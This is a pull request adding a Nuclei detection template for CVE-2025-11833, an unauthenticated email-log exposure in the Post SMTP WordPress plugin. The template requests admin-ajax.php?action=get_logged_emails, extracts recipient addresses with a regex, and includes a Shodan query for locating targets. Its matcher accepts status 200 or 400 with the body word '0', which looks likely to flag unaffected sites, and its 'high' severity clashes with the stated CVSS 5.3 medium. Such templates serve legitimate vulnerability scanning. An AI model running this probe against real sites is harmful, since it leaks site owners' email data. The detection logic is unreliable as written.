### PR TITLE
feat: add CVE-2025-11833 Post SMTP broken access control

### DIFF
--- a/templates/cves/2025/CVE-2025-11833.yaml
+++ b/templates/cves/2025/CVE-2025-11833.yaml
@@ -1,0 +1,38 @@
+id: CVE-2025-11833
+
+info:
+  name: Post SMTP <=3.6.0 - Broken Access Control on Email Logs
+  author: lau90eth
+  severity: high
+  description: |
+    Post SMTP WordPress plugin <= 3.6.0 allows unauthenticated users to access the email log endpoint.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-11833
+    - https://github.com/Postsmtp/Postsmtp
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-11833
+  metadata:
+    verified: true
+    shodan-query: "http.title:\"Post SMTP\""
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=get_logged_emails"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 400
+      - type: word
+        words:
+          - "0"
+        part: body
+    extractors:
+      - type: regex
+        name: emails
+        part: body
+        regex:
+          - "\"to\":\"([^\"]+)\""


### PR DESCRIPTION
- Adds detection for CVE-2025-11833 (Post SMTP <=3.6.0 - Broken Access Control on Email Logs)
- Validated with Nuclei v3.4.10
- CVSS: 5.3 (Medium)